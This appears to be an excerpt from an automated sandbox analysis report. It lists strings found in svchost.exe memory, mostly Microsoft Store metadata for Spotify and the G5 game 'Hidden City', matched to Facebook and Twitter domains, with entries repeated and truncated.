                    Source: svchost.exe, 0000000E.00000003.767667320.000001D9CB1DF000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE equals www.facebook.com (Facebook)
                    Source: svchost.exe, 0000000E.00000003.767667320.000001D9CB1DF000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE equals www.twitter.com (Twitter)
                    Source: svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                    Source: svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                    Source: svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                    Source: svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":374031458,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_neutral_~_ytsefhwckbdv6","PackageId":"a6dc1cf8-bc09-462b-7e62-6a662d08d291-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
                    Source: svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":374031458,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_neutral_~_ytsefhwckbdv6","PackageId":"a6dc1cf8-bc09-462b-7e62-6a662d08d291-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
                    Source: svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":374031458,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_neutral_~_ytsefhwckbdv6","PackageId":"a6dc1cf8-bc09-462b-7e62-6a662d08d291-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
                    Source: svchost.exe, 0000000E.00000003.759319799.000001D9CB19C000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                    Source: svchost.exe, 0000000E.00000003.759319799.000001D9CB19C000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","P